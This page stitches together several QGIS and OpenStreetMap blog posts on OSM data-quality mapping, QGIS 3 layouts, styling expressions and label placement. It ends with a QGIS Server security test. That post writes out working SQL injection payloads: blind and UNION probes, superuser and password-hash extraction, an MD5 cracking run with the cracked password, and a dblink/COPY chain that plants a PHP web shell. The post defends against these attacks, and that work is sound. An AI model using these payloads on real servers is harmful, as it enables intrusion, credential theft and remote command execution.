elements = pd.read_table('../src/data/output-extracts/bordeaux-metropole/bordeaux-metropole-elements.csv', parse_dates=['ts'], index_col=0, sep=",")
elements.head().T
   elem        id  version  visible         ts    uid  chgset
0  node  21457126        2    False 2008-01-17  24281  653744
1  node  21457126        3    False 2008-01-17  24281  653744
2  node  21457126        4    False 2008-01-17  24281  653744
3  node  21457126        5    False 2008-01-17  24281  653744
4  node  21457126        6    False 2008-01-17  24281  653744

This short description helps us to identify some basic features, which are built in the following snippets. First we recover the temporal features:

elem_md = (elements.groupby(['elem', 'id'])['ts']
            .agg(["min", "max"])
            .reset_index())
elem_md.columns = ['elem', 'id', 'first_at', 'last_at']
elem_md['lifespan'] = (elem_md.last_at - elem_md.first_at)/pd.Timedelta('1D')
extraction_date = elements.ts.max()
elem_md['n_days_since_creation'] = ((extraction_date - elem_md.first_at)
                                  / pd.Timedelta('1d'))
elem_md['n_days_of_activity'] = (elements
                              .groupby(['elem', 'id'])['ts']
                              .nunique()
                              .reset_index())['ts']
elem_md = elem_md.sort_values(by=['first_at'])
                                    213418
elem                                  node
id                               922827508
first_at               2010-09-23 00:00:00
last_at                2010-09-23 00:00:00
lifespan                                 0
n_days_since_creation                 2341
n_days_of_activity                       1

Then we build the remaining variables, e.g. how many versions, contributors, and changesets per element:

    elem_md['version'] = (elements.groupby(['elem','id'])['version']
                          .max()
                          .reset_index())['version']
    elem_md['n_chgset'] = (elements.groupby(['elem', 'id'])['chgset']
                           .nunique()
                           .reset_index())['chgset']
    elem_md['n_user'] = (elements.groupby(['elem', 'id'])['uid']
                         .nunique()
                         .reset_index())['uid']
    osmelem_last_user = (elements
                         .groupby(['elem','id'])['uid']
                         .last()
                         .reset_index())
    osmelem_last_user = osmelem_last_user.rename(columns={'uid':'last_uid'})
    elements = pd.merge(elements, osmelem_last_user,
                       on=['elem', 'id'])
    elem_md = pd.merge(elem_md,
                       elements[['elem', 'id', 'version', 'visible', 'last_uid']],
                       on=['elem', 'id', 'version'])
    elem_md = elem_md.set_index(['elem', 'id'])
    elem_md.sample().T
elem                                  node
id                              1340445266
first_at               2011-06-26 00:00:00
last_at                2011-06-27 00:00:00
lifespan                                 1
n_days_since_creation                 2065
n_days_of_activity                       2
version                                  2
n_chgset                                 2
n_user                                   1
visible                              False
last_uid                            354363

As an illustration, we have above an old node with two versions, which is no longer visible on the OSM website.

1.2 Characterize OSM elements with user classification

This set of features is only descriptive; we have to add more information to be able to characterize OSM data quality. That is the moment to exploit the user classification produced in the last blog post!

As a reminder, we hypothesized that clustering the users allows us to evaluate their trustworthiness as OSM contributors. According to the previous classification, they are either beginners, intermediate users, or even OSM experts.

Each OSM entity may have received one or more contributions by users of each group. Let’s say the entity quality is good if its last contributor is experienced. That leads us to classify the OSM entities themselves in return!

How to include this information into element metadata?

We first need to recover the results of our clustering process.

user_groups = pd.read_hdf("../src/data/output-extracts/bordeaux-metropole/bordeaux-metropole-user-kmeans.h5", "/individuals")
user_groups.head()
           PC1       PC2       PC3       PC4       PC5       PC6  Xclust
uid                                                                     
1626 -0.035154  1.607427  0.399929 -0.808851 -0.152308 -0.753506       2
1399 -0.295486 -0.743364  0.149797 -1.252119  0.128276 -0.292328       0
2488  0.003268  1.073443  0.738236 -0.534716 -0.489454 -0.333533       2
5657 -0.889706  0.986024  0.442302 -1.046582 -0.118883 -0.408223       4
3980 -0.115455 -0.373598  0.906908  0.252670  0.207824 -0.575960       5

As a remark, there were several important results to save after the clustering process; we decided to serialize them into a single binary file. Pandas knows how to manage such files, so it would be a pity not to take advantage of that!

We recover the individual groups from the eponymous table of the binary file (column Xclust), and only have to join them to the element metadata as follows:

elem_md = elem_md.join(user_groups.Xclust, on='last_uid')
elem_md = elem_md.rename(columns={'Xclust':'last_uid_group'})
elem_md.reset_index().to_csv("../src/data/output-extracts/bordeaux-metropole/bordeaux-metropole-element-metadata.csv")
elem_md.sample().T
elem                                  node
id                              1530907753
first_at               2011-12-04 00:00:00
last_at                2011-12-04 00:00:00
lifespan                                 0
n_days_since_creation                 1904
n_days_of_activity                       1
version                                  1
n_chgset                                 1
n_user                                   1
visible                               True
last_uid                             37548
last_uid_group                           2

From now on, we can use the last contributor cluster as additional information to generate maps and study data quality…

Wait… Isn’t there a piece of information missing? Well yes, maybe the most important one when dealing with geospatial data: the location itself!

1.3 Recover the geometry information

Even though the Pyosmium library is able to retrieve OSM element geometries, we ran some tests with another OSM data parser here: osm2pgsql.

We can recover geometries from standard OSM data with this tool, assuming the existence of an osm database owned by user:

osm2pgsql -E 27572 -d osm -U user -p bordeaux_metropole --hstore ../src/data/raw/bordeaux-metropole.osm.pbf

We specify a France-focused SRID (27572), and a prefix for naming the output tables point, line, polygon and roads.

We can work with the line subset, which contains the physical roads among other structures (it roughly corresponds to OSM ways), and build an enriched version of the element metadata, with geometries.

First we can create the table bordeaux_metropole_elements, which will contain our metadata…

DROP TABLE IF EXISTS bordeaux_metropole_elements;
DROP TABLE IF EXISTS bordeaux_metropole_geomelements;
CREATE TABLE bordeaux_metropole_elements(
       id int,
       elem varchar,
       osm_id bigint,
       first_at varchar,
       last_at varchar,
       lifespan float,
       n_days_since_creation float,
       n_days_of_activity float,
       version int,
       n_chgsets int,
       n_users int,
       visible boolean,
       last_uid int,
       last_user_group int
);

…then, populate it with the appropriate .csv file…

COPY bordeaux_metropole_elements
FROM '/home/rde/data/osm-history/output-extracts/bordeaux-metropole/bordeaux-metropole-element-metadata.csv'
WITH(FORMAT CSV, HEADER, QUOTE '"');

…and finally, merge the metadata with the data gathered with osm2pgsql, which contains the geometries.

SELECT l.osm_id, h.lifespan, h.n_days_since_creation,
h.version, h.visible, h.n_users, h.n_chgsets,
h.last_user_group, l.way AS geom
INTO bordeaux_metropole_geomelements
FROM bordeaux_metropole_elements as h
INNER JOIN bordeaux_metropole_line as l
ON h.osm_id = l.osm_id AND h.version = l.osm_version
WHERE l.highway IS NOT NULL AND h.elem = 'way'
ORDER BY l.osm_id;

Wow, this is wonderful, we have everything we need in order to produce new maps, so let’s do it!

2 Keep it visual, man!

Building on the latest developments and some hypotheses about element quality, we are able to produce some customized maps. If each OSM entity (e.g. each road) can be characterized, then we can draw quality maps by highlighting the most trustworthy entities, as well as those with which we have to stay cautious.

In this post we will continue to focus on roads within the Bordeaux area. The different maps will be produced with the help of QGIS.

2.1 First step: simple metadata plotting

As a first insight into OSM elements, we can plot each OSM way according to simple features like the number of users who have contributed, the number of versions, or the element anteriority (age).

Figure 1: Number of active contributors per OSM way in Bordeaux

 

Figure 2: Number of versions per OSM way in Bordeaux

With the first two maps, we see that the ring road around Bordeaux is the most intensively modified part of the road network: more unique contributors are involved in completing these ways, and more versions exist for each element. Some major roads within the city center show the same characteristics.

Figure 3: Anteriority of each OSM way in Bordeaux, in years

If we consider the anteriority of OSM roads, we get a different but interesting insight into the area. The oldest roads are mainly located within the city center, even if there are some exceptions. It is also interesting to notice that some spatial patterns arise with temporality: entire neighborhoods were mapped within the same period.

2.2 More complex: OSM data merging with alternative geospatial representations

To go deeper into the mapping analysis, we can use the INSEE gridded (“carroyed”) data, which divides France into 200-meter square tiles. OSM element statistics can then be aggregated per tile to produce additional maps. Unfortunately, some information loss will occur, as such tiles are only defined where people live. However, it provides an interesting alternative illustration.

To exploit this new data set, we have to merge the previous table with the corresponding INSEE table. Creating indexes on them before running such a merge is of great interest:

CREATE INDEX insee_geom_gist
ON open_data.insee_200_carreau USING GIST(wkb_geometry);
CREATE INDEX osm_geom_gist
ON bordeaux_metropole_geomelements USING GIST(geom);

DROP TABLE IF EXISTS bordeaux_metropole_carroyed_ways;
CREATE TABLE bordeaux_metropole_carroyed_ways AS (
SELECT insee.ogc_fid, count(*) AS nb_ways,
avg(bm.version) AS avg_version, avg(bm.lifespan) AS avg_lifespan,
avg(bm.n_days_since_creation) AS avg_anteriority,
avg(bm.n_users) AS avg_n_users, avg(bm.n_chgsets) AS avg_n_chgsets,
insee.wkb_geometry AS geom
FROM open_data.insee_200_carreau AS insee
JOIN bordeaux_metropole_geomelements AS bm
ON ST_Intersects(insee.wkb_geometry, bm.geom)
GROUP BY insee.ogc_fid
);

As a consequence, we get only 5468 individuals (tiles), a quantity that must be compared to the 29427 roads previously handled… This operation will also simplify the map analysis!

We can propose another version of the previous maps using QGIS; let’s consider the average number of contributors per OSM road, for each tile:

Figure 4: Number of contributors per OSM roads, aggregated by INSEE tile

2.3 The cherry on the cake: representation of OSM elements with respect to quality

Last but not least, the information about the last user cluster can shed some light on OSM data quality: by plotting each road according to the last user who contributed to it, we might identify questionable OSM elements!

We simply have to design a map similar to those in the previous section, with the user classification information:

Figure 5: OSM roads around Bordeaux, according to the last user cluster (1: C1, relation experts; 2: C0, versatile expert contributors; 3: C4, recent one-shot way contributors; 4: C3, old one-shot way contributors; 5: C5, locally inexperienced way specialists)

According to the clustering done in the previous article (be careful, the legend is not the same here…), we can make some additional hypotheses:

  • Light-blue roads are OK; they correspond to the most trusted cluster of contributors (91.4% of the roads in this example).
  • There is no group-0 road (group 0 corresponds to cluster C2 in the previous article)… And that’s comforting! It seems that “untrustworthy” users do not contribute to roads or, more probably, that their contributions are quickly amended.
  • Other contributions are made by intermediate users: a finer analysis should be undertaken to decide if the corresponding elements are valid. For now, we can consider everything is OK, even if local patterns seem strong. Areas of interest should be verified (they are not necessarily of low quality!)

For sure, it gives a fairly new picture of OSM data quality!

3 Conclusion

In this last article, we have designed new maps on a small area, starting from element metadata. You have seen the conclusion of our analysis: characterizing the OSM data quality starting from the user contribution history.

Of course some work still has to be done; however, we have detailed a whole methodology to tackle the problem. We hope you will be able to reproduce it, and to design your own maps!

Feel free to contact us if you are interested in this topic!

QGIS layouts rewrite – progress report #1

Following our recent successful QGIS Layout and Reporting Engine crowdfunding campaign, we’ve been hard at work ripping up the internals of the QGIS 2.x print composer and rebuilding a brand new, shiny QGIS layouts engine. This is exciting work – it’s very satisfying to be able to clean up a lot of the old composer code in QGIS and take opportunities along the way to fix long-standing bugs and add new features.

While it’s not ready for daily use yet, there’s already been a lot of interesting changes which have landed in the layouts work as a result of this campaign. Let’s take a look at what’s been implemented so far…

  • We’ve added support for different measurement units throughout layouts. While this means it’s now possible to set page sizes using centimeters, inches, pixels, points, etc., it goes much deeper than just that. In layouts, everything which has a size or position can take advantage of this unit support. So you can have page sizes in centimeters, but a map item with a size set in points, and positioned in millimeters! Having pixels as a unit type makes creation of screen-based layouts much easier – even right down to pixel-perfect positioning and sizing of items…
  • Page handling has been totally reworked. Instead of the single “number of pages” control available in QGIS 2.x, layouts have complete flexibility in page setup. It’s now possible to have a layout with mixed page sizes and orientations (including data defined page size for different pages in the layout!). 
  • A revised status bar, with improved layout interaction widgets. We’ve also taken the opportunity to add some new features like a zoom level slider and option to zoom to layout width:
  • Layout interaction tools (such as pan/zoom/insert item/etc) have been reworked. There’s now a much more flexible framework for creation of layout tools (based off the main QGIS map canvas approach), which even allows for plugins to implement their own layout interaction tools! As part of this we’ve addressed a long standing annoyance which meant that creating new items always drew the “preview” shape of the new item as a rectangle – even for non-rectangular items. Now you get a real shape showing exactly how the created item will be sized and positioned:
  • On the topic of plugins – the layout branch has full support for plugin-provided item types. This means that QGIS plugins can create new classes of items which can be added to a layout. This opens the door for plugins allowing charts and visualisations which take advantage of all the mature Python and JS charting libraries! This is a really exciting change – in 2.x there was no way for plugins to extend or interact with composer, so we’re really keen to see where the community takes this when 3.0 is released.
  • We’ve ported another feature commonly found in illustration/DTP applications. Now, when you’re creating a new item and just click in your layout (instead of click-and-drag), you get a handy dialog allowing you to specify the exact position and dimensions for the created item. You can again see in this dialog how layouts have full support for units for both the position and size:
  • Another oft-requested feature which we’ve finally been able to add (thanks to the refactored and cleaned code) is a context menu for layouts! It’s currently quite empty, but will be expanded as this work progresses…
  • Snapping to guides and grids has been reworked. We’ve added a new snapping marker to show exactly where items will be snapped to:
  • Snapping to guides now occurs when creating new layout items (this didn’t happen in Composer in 2.x – only snapping to grids occurred when drawing new items).
  • The snapped cursor position is shown in the status bar whenever a snapped point will be used, instead of the unsnapped position.
  • Unlike Composer in QGIS 2.x, layouts in 3.0 adopt the standard UX of dragging out rulers to create guide lines (instead of clicking on a ruler position to create a new guide). A horizontal guide is now created by grabbing the top ruler and dragging it down, and a vertical guide by grabbing the left ruler and dragging it out onto the layout.
  • Better feedback is given in the ruler when a guide can be dragged. We now show guide positions in the rulers, and give an indication (via mouse cursor change) when these guides can be repositioned by click-and-drag.
  • Another very exciting change is the addition of a new “Guide Manager”. The guide manager allows numeric modification of existing guides and creation of new guides. Finally it’s possible to position guides at exact locations! Again, you can see the full support for layout units in place here – guides can be positioned using any available unit.
  • There’s also a handy new shortcut in the Guide Manager to allow applying the guides from the current page to all other pages in your layout.
  • We've refined the snapping logic. In Composer in QGIS 2.x, grids would always take precedence whenever both a grid and a guide were within tolerance of a point. Now, guides always take precedence – since they have been manually set by users, we assume they have been explicitly placed at highly desirable snapping locations and should be selected over the general background grid. Additionally, grid snapping was previously only done if BOTH the x and y of the point could be snapped to the grid. We now snap to the nearest grid line for x and y separately. This means that if a point is close to a vertical grid line but not a horizontal one, it will still snap to that nearby vertical grid line.
  • Lastly, we’ve added a handy context menu to the rulers:

This is just a taster of the great new functionality coming in QGIS 3.0. This is all a direct result of the forward-thinking investments and generosity of the backers in our QGIS Layout and Reporting Engine crowdfunding campaign. Without their contributions, none of this would be possible – so our thanks go out to those organisations and individuals once again!

Stay tuned for more updates as the work continues…

 

 

Dynamic styling expressions with aggregates & variables

In a recent post, we used aggregates for labeling purposes. This time, we will use them to create a dynamic data driven style, that is, a style that automatically adjusts to the minimum and maximum values of any numeric field … and that field will be specified in a variable!

But let’s look at this step by step. (This example uses climate.shp from the QGIS sample dataset.)

Here is a basic expression for data defined symbol color using a color ramp:
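For example, an expression along these lines does the job (a sketch only: the 'Blues' ramp name, the T_F_JUL field, and the 0 to 100 bounds are placeholders to adapt to your data):

ramp_color('Blues', scale_linear("T_F_JUL", 0, 100, 0, 1))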

Similarly, we can configure a data defined symbol size to create a style like this:

Temperatures in July

To stretch the color ramp from the attribute field’s minimum to maximum value, we can use aggregate functions:
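A sketch of such an expression (again with placeholder ramp and field names) replaces the hard-coded bounds with the minimum() and maximum() aggregate functions:

ramp_color('Blues', scale_linear("T_F_JUL", minimum("T_F_JUL"), maximum("T_F_JUL"), 0, 1))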

That’s nice but if we want to be able to quickly switch to a different attribute field, we now have two expressions (one for color and one for size) to change. This can get repetitive and can be the source of errors if we miss an expression and don’t update it correctly …

To avoid these issues, we use a layer variable to store the name of the field that we want to use. Layer variables can be configured in layer properties:

Then we adjust our expression to use the layer variable. Here is where it gets a bit tricky. We cannot simply replace the field name “T_F_JUL” with our new layer variable @style_field, since this creates an invalid expression. Instead, we have to use the attribute function:
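The adjusted expression then looks roughly like this (a sketch: every direct reference to the field is replaced by attribute($currentfeature, @style_field), and the ramp name is still a placeholder):

ramp_color('Blues',
  scale_linear(attribute($currentfeature, @style_field),
               minimum(attribute($currentfeature, @style_field)),
               maximum(attribute($currentfeature, @style_field)),
               0, 1))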

With this expression in place, we can now change the layer variable to T_M_JAN and the style automatically adjusts accordingly:

Temperatures in January

Note how the style also labels the point with the highest temperature? That’s because the style also defines an expression for the show labels option.
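One way to write such a show-labels expression (a sketch, reusing the @style_field layer variable from above) is to compare each feature's value to the layer maximum:

attribute($currentfeature, @style_field) = maximum(attribute($currentfeature, @style_field))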

It is worth noting that, in most cases, temperature maps should not be styled using a color ramp that adjusts to a specific dataset's min and max values. Instead, we would want a style with a fixed value-to-color mapping that makes different datasets comparable. In many other use cases, however, it is very convenient to have a style that can automatically adapt to the data.


BGT import plugin

The Dutch Basisregistratie Grootschalige Topografie (BGT) is exchanged via GML. Unfortunately, the GML application schema used is quite involved and leads to incomplete imports in QGIS. The BGT import plugin is now available so that the GML files can be imported correctly. To illustrate the point, here are two screenshots (one wrong, and one right):

Using Trigonometry To Place And Orientate Labels

Geologists display the dip and strike of rock layers on geological maps using a dip and strike symbol, where dip in degrees indicates the maximum angle a rock layer descends relative to the horizontal. However, it is not directly possible in QGIS 2.18, using basic label settings, to place and orient a dip label next to a dip and strike symbol.

However, there is a way around this issue using trigonometry and the layer's Attribute Table. This method may be useful for controlling the position and orientation of labels around point features in general. The first step is to add these two new columns to the Attribute Table:

  • Angle – 0° is North and values increase clockwise up to 359°
  • Distance – label distance from a point feature

You can add Angle and Distance values to these columns manually or use the Field Calculator (see below) to add values if you have lots of points. Also, I chose Map Units (not millimeters) for Symbol Size, Font Size and Distance for my map, as I preferred to keep the symbol size, font size and position of labels fixed when zooming in and out.


Note – I use Strike (Angle) and Label Distance (Distance) in my Attribute Table

The next step is to control the position of the label around the points using trigonometry. Right click the points layer and choose:

Properties – Labels – Placement

Make sure Offset From Point is checked, then click the Data Defined Override next to the Offset X, Y boxes and choose Edit. The Expression String Builder will appear. Enter the following expression in the Expression String Builder window:

to_string( ((-1) * ( "Distance" )) * cos( radians( "Angle" ))) || ',' || to_string( ((-1) * ( "Distance" )) * sin( radians( "Angle" )) )
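As a quick sanity check of the formula, assume Angle = 45 and Distance = 100 (map units):

X = -100 * cos( radians(45) ) ≈ -70.7
Y = -100 * sin( radians(45) ) ≈ -70.7

so the expression returns the string '-70.7,-70.7', which QGIS uses as the X, Y offset for that label.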

The expression takes the angle and distance values from the Attribute Table (edited earlier) and calculates an X, Y label position relative to the point feature. You may also optionally control the angle of a symbol or icon itself via:

Layer Properties – Style – click Data Defined Override icon – Edit

Then enter the following expression in the Data Defined Override dialogue:

"Angle" - 90

Finally, to control the rotation of label text, so text follows the orientation (angle) of a rotating symbol or icon, choose:

Layer Properties – Labels – Placement – Data Defined – Rotation

Click the Data Defined Override Icon again and then choose Edit. Enter the following expression in the Data Defined Override dialogue:

("Angle" - 90) * -1

The following geological map of the Old Head of Kinsale in southern Ireland shows the results of the above procedure. We see that the dip labels rotate and correctly follow the orientation of the dip and strike symbols (note that the points are at the intersection of the T symbol).


Geological Survey of Ireland – Creative Commons Attribution 4.0 license

You may have several different symbols, of various sizes, each requiring an appropriate label distance in the Attribute Table. It took me a few tries before I found the right distances for my geological symbols, ranging from 90 to 230 meters depending on the symbol size and type.

Lastly, the expressions "Angle" - 90 and ("Angle" - 90) * -1 were necessary in my case because I needed to place my labels next to the dip and strike symbol's barb. You may need a different expression, e.g. "Angle" and ("Angle") * -1, or a value other than 90°, depending on the symbol used and the preferred label placement location. Some trial and error may be required to find the correct label position.


(Nederlands) Working with the BGT in QGIS yourself

Sorry, this entry is only available in the Dutch language

QGIS Server: security aspect

Testing and proofing QGIS 3 against security leaks – a bit of context

QGIS Server is an open source OGC data server which uses the QGIS engine as its backend. What makes it really awesome is that a simple desktop QGIS project file can be served as web services with exactly the same rendering, and without any mapfile or XML coding by hand.

QGIS Server provides a way to serve OGC web services like WMS, WCS and WFS resources from a QGIS project, but it also extends them with requests like GetPrint, which takes advantage of QGIS's map composer power to generate high-quality PDF outputs.

Oslandia decided to get strongly involved in the QGIS Server refactoring work and co-organized a dedicated code sprint in Lyon.

We also want to warmly thank Orange (the French internet and phone provider) for its financial support, which helps us ensure QGIS 3 is the next generation of bulletproof, fast and easy-to-use open source web map servers.

 

 

When it comes to managing a web map server in a critical production environment, security is a mandatory item. The main issues specific to OGC web services are SQL injections. These attacks try to find leaks by getting the server to execute injected SQL statements through the queries sent to it. Oslandia decided to tackle that issue early in the server refactoring process. Here is what has been done to check for potential leaks in the current code and to ensure that no regression can creep into future versions.

Real work now!

QGIS Server runs as a FastCGI process behind a properly configured NGINX or Apache web server, to which we can send requests. For example, retrieving some information at a specific pixel location on a map can be done with a GetFeatureInfo request, where the position is given via the I and J parameters:

http://myserver.com/qgisserver?
QUERY_LAYERS=point&LAYERS=point&
SERVICE=WMS&
WIDTH=500&HEIGHT=500&
BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&
MAP=/home/user/project.qgs&
VERSION=1.1.1&
REQUEST=GetFeatureInfo&
I=250&J=250

The response will be something like this:

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = 'Single point'
name = 'a'

There’s more. The FILTER parameter can be used instead of the position in pixels. Then, we can retrieve information on a specific feature:

http://myserver.com/qgisserver?
QUERY_LAYERS=point&LAYERS=point&
SERVICE=WMS&
WIDTH=500&HEIGHT=500&
BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&
MAP=/home/user/project.qgs&
VERSION=1.1.1&
REQUEST=GetFeatureInfo&
FILTER=point:"name" = 'b'

With this specific filter, we get the underlying data for the feature named ‘b’:

GetFeatureInfo results
Layer 'point'
Feature 2
pkuid = '2'
text = ''
name = 'b'

But how does it work? The filter is forwarded to the data provider as a WHERE clause. In QGIS's case, that clause is forwarded directly to the database server if the datasource is a database. (Note: for file datasources, QGIS loads the dataset into memory, so using a database is always better.) A simplified example:

SELECT * FROM point WHERE ( "name" = 'b' );

It's a very convenient way of retrieving information, but it's also an entry point for SQL injection attacks. QGIS Server already checks the sanity of requests to avoid this kind of attack. We needed to prove the effectiveness of those checks, so we deactivated them and tried to inject SQL through this FILTER. You know, just to see what happens!

Stacked queries

Firstly, we tried the most obvious attack: stacked queries. The idea is to use the semicolon character to terminate the initial query and then execute your own. For example, with FILTER=point:"name" = 'b' ); DROP TABLE point --, we would like to execute the underlying query:

SELECT * FROM point where ( "name" = 'b' ); DROP TABLE point -- )

The aim is obviously to damage the database. However, even without the sanity check, it doesn't work, because the parsing step splits the filter string into several subfilters on the semicolon character:

subfilter 1: point:"name" = 'b' )
subfilter 2: DROP TABLE point -- )

Moreover, the expected format for a filter is something like tablename:"column_name" = 'value'. Thus, subfilter 2 is simply ignored and never reaches the WHERE clause. And this is true whatever the position of the semicolon. So even a filter like FILTER=point:"name" = 'b ); DROP TABLE point --' (note the injection within the value) does not work.

By the way, URL encoding is properly decoded… so this kind of attack does not work either: FILTER=point:"name" = 'b' )%3B DROP TABLE point -- (where %3B is the URL-encoded semicolon).

Good point QGIS, let’s go further now.

Boolean-based blind attack

The idea behind a blind attack is to run some queries and observe the resulting behaviour to detect whether or not they cause errors. And this time, without the sanity check, the attack is successful!

The first step is to detect the kind of database used by the QGIS project. A simple query allows us to do that, with FILTER=point:"name" = 'b') OR (SELECT version() = ''). The SQL query actually executed is:

SELECT * FROM point WHERE ( "name" = 'b' ) OR ( SELECT version() = '' )

We know that the feature named ‘b’ exists. So, if the GetFeatureInfo returns a result which is not for the feature ‘b’, it means that the version() function is not defined. In our case, we have this result:

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = 'Single point'
name = 'a'

So the database is not PostgreSQL. However, we can deduce that the database is SQLite, because a valid result is returned when FILTER=point:"name" = 'b') OR ( SELECT sqlite_version() = '' ) is used!

Time-based blind attack

Time-based attacks are used to guess which database is running behind the scenes by using time functions that give specific results for each database type. And once you know the database, you potentially know its known security leaks…

To perform a time-based attack, a delay is introduced in the query. The response time of the server then allows us to deduce whether the assumption is correct. Once again, we get results when the sanity check is deactivated!

Thanks to the previous attack, we know that the database used by the project is SQLite. But unlike databases such as PostgreSQL, where a pg_sleep function exists, there is no such function in SQLite. So we have to use a trick to make the query spend some time. If we want to check the current version, nothing is simpler than the next filter: FILTER=point:"name" = 'b') AND (select case sqlite_version() when '3.10.0' then substr(upper(hex(randomblob(99999999))),0,1) end)--.

SELECT * FROM point
    WHERE ( "name" = 'b' )
    AND (
        SELECT CASE sqlite_version() WHEN '3.10.0' THEN
            substr(upper(hex(randomblob(99999999))),0,1)
        END
    )
--

With this request, the response time of the server is about 0.0123 seconds. However, if we run the same query but this time by replacing ‘3.10.0’ with ‘3.15.0’, the response time is about 2.9 seconds!

UNION-based attack

Since we cannot execute custom queries to directly damage the database, we tried to retrieve information which should, in theory, be hidden from the client. With UNION-based attacks, it can be possible to get whole table contents (nasty, isn't it?). Check this out for a demo: https://www.youtube.com/watch?v=N_rzhZWNwlU

So we launched those attacks and, again, once the sanity check was deactivated in the QGIS Server code, the attacks succeeded. The sanity checks prove their worth once again!

Within the QGIS Server configuration, it is possible to define a layer as EXCLUDED. A client then cannot get information for this specific layer. In our case, the aoi layer is excluded in the project and GetFeatureInfo always returns empty results when we query it. However, let's see what happens with the WHERE clause when this filter is used: FILTER=point:"name" = 'fake') UNION SELECT 1,1,* FROM aoi --.

SELECT * FROM point WHERE ( "name" = 'fake' ) UNION SELECT 1,1,* FROM aoi -- )

As there’s no feature named ‘fake’, we retrieve data from the aoi layer!

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = '1'
name = 'private_value'

From this, we can apply the attack to retrieve other information, such as the names of tables within the database. For the next example, now that we know a SQLite database is being used (thanks to the blind attack), we can write a filter like this: FILTER=point:"name" = 'fake') UNION SELECT 1,1,name,1,1 FROM sqlite_master WHERE type = 'table' --

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = 'SpatialIndex'
name = ''

That’s not a big deal!?

Thanks to the previous injections, plenty of possibilities are right in front of us. And depending on the system administration of the server hosting QGIS Server, the extensions currently loaded, the password strength of the database users and much more, an attacker may be able to do far more damage than just retrieving some data from a hidden layer… In this part, we will assume that a PostgreSQL database is running!

We observed that UNION-based attacks do not work with the PostgreSQL backend, even with the sanity check deactivated, due to some closing parentheses. However, by combining the Boolean-based blind attack with brute-force pattern matching, we are able to extract critical information:

FILTER=
point:"name" = 'b' OR (
    SELECT usename FROM pg_user WHERE
        usesuper IS TRUE
        AND usename LIKE 'a%'
    )
    != ''

Obviously, the aim of the filter is to find the name of a superuser. Either the response is about the 'b' feature and there is no superuser whose name begins with the letter 'a', or the response is not about 'b' and then a superuser beginning with 'a' exists. By iterating over the pattern (first 'a%', 'b%', … until the response changes, then 'fa%', 'fb%', … for the second letter, and so on), we are able to retrieve the name of a superuser! Clearly it requires time and resources, but it's a powerful technique which is very widely used. In our case, a superuser named foo is found. And once we have a superuser name, we are able to retrieve its MD5 password with the same technique:

FILTER=
point:"name" = 'b' OR (
    SELECT passwd FROM pg_shadow WHERE usename = 'foo'
    AND passwd LIKE 'md5a%'
) != ''

And if the password is not strong enough, cracking the MD5 hash is not very complicated with the right tools: hashcat, MDCrack, … For example, on my laptop, MDCrack (run through Wine) is able to test more than 35 million MD5 hashes per second:

$ wine MDCrack-sse.exe --benchmark
System / Starting MDCrack v1.8(3)
System / Detected processor(s): 4 x 2.39 Ghz INTEL Itanium | MMX | SSE | SSE2 | SSE3

------------------------------/ MD5 / DH / 4 Threads
Info   / Benchmarking ( pass #1 )... 35 193 192 ( 3.52e+007 ) h/s.

Thanks to the previous step, we got the following hash bdbf4c08fb950992d27f229a08cba675 and MDCrack was able to crack it in less than 10 minutes:

$ time wine MDCrack-sse.exe --algorithm=MD5 --append=foo bdbf4c08fb950992d27f229a08cba675

System / Starting MDCrack v1.8(3)
System / Target hash: bdbf4c08fb950992d27f229a08cba675
----/ Thread #2 (Success) \----
System / Thread #2: Collision found: f03l8ofoo
Info   / Thread #2: Candidate/Hash pairs tested: 3 680 552 562 ( 3.68e+009 ) in 9min 22s 895ms

real    9m23.138s
user    27m50.820s
sys 0m6.440s

The password actually found is f03l8o. Then, still using pattern matching, we obtained the names of other databases on the hosting server. And with other kinds of advanced SQL injection, it's even possible to retrieve the IP and port of the database server (with the inet_server_addr() and inet_server_port() functions). Thanks to this information, an attacker may go much further, and it's even simpler if the dblink extension is loaded. From that moment on, we can do whatever we want on other databases, like creating tables:

FILTER=
point:"name" = 'b' OR (
    SELECT * FROM dblink(
        'host=XXX.XXX.XXX.XXX user=foo password=f03l8o dbname=privdb',
        'CREATE TABLE utils(cmd TEXT)'
    )
    RETURNS (result TEXT)
) = ''

As well as inserting values:

FILTER=
point:"name" = 'b' OR (
    SELECT * FROM dblink(
        'host=XXX.XXX.XXX.XXX user=foo password=f03l8o dbname=privdb',
        'INSERT INTO utils VALUES( ''<?php echo exec($_GET["cmd"]); ?>'' )'
    )
    RETURNS (result TEXT)
) = ''

Another kind of attack that we haven't even brought up yet uses the COPY statement. If you don't see where I'm going with this, take a look at the next filter:

FILTER=
point:"name" = 'b' OR (
    SELECT * FROM dblink(
        'host=XXX.XXX.XXX.XXX user=foo password=f03l8o dbname=privdb',
        'COPY ( SELECT * FROM utils ) to ''/var/www/html/cache/backdoor.php'''
    )
    RETURNS (result TEXT)
) = ''

The COPY statement allows you to save the content of a table into a file. Obviously, it can be tedious to find a directory with the right permissions, but it's common to have some cache directory with write permissions under /var/www. And just thanks to the previous command, we have created an operating system backdoor which allows us to run shell commands directly on the OS hosting QGIS Server:

$ curl "http://myserver.com/cache/backdoor.php?cmd=uname -a"
Linux oslandia 4.8.0-1-amd64 #1 SMP Debian 4.8.5-1 (2016-10-28) x86_64 GNU/Linux

Sanity check reactivated

Once the sanity check was reactivated, none of the previous attacks worked! Good news!

Actually, this is mainly due to the whitelist of allowed characters and tokens, which is very limited. As soon as the filter string contains unauthorized keywords (such as UNION, SELECT, -, …), the request is simply rejected!
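To make this concrete, here is a sketch (based on the whitelist quoted in the exception report below) of a filter that passes and one that is refused:

FILTER=point:"name" = 'b' AND "pkuid" > '1'           (accepted: only whitelisted tokens)
FILTER=point:"name" = 'b' UNION SELECT * FROM aoi     (rejected: UNION and SELECT are not whitelisted)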

Moreover, some tokens considered dangerous are escaped by duplication. For instance, all inner single quotes are duplicated so that they are interpreted as quotes within the string (and not as the end of the string). The same is done for backslashes, to avoid any special meaning for the following character.

And let us also not forget that the filter string is split on the semicolon character, which considerably reduces the attack opportunities.

Another kind of attack which has not been discussed so far is the error-based attack. In this case, the aim is to extract errors generated by the database when an invalid query is passed. However, in the case of an invalid query, the error message coming from the database never reaches the server side. Actually, the only variable used to generate the exception report is the filter string:

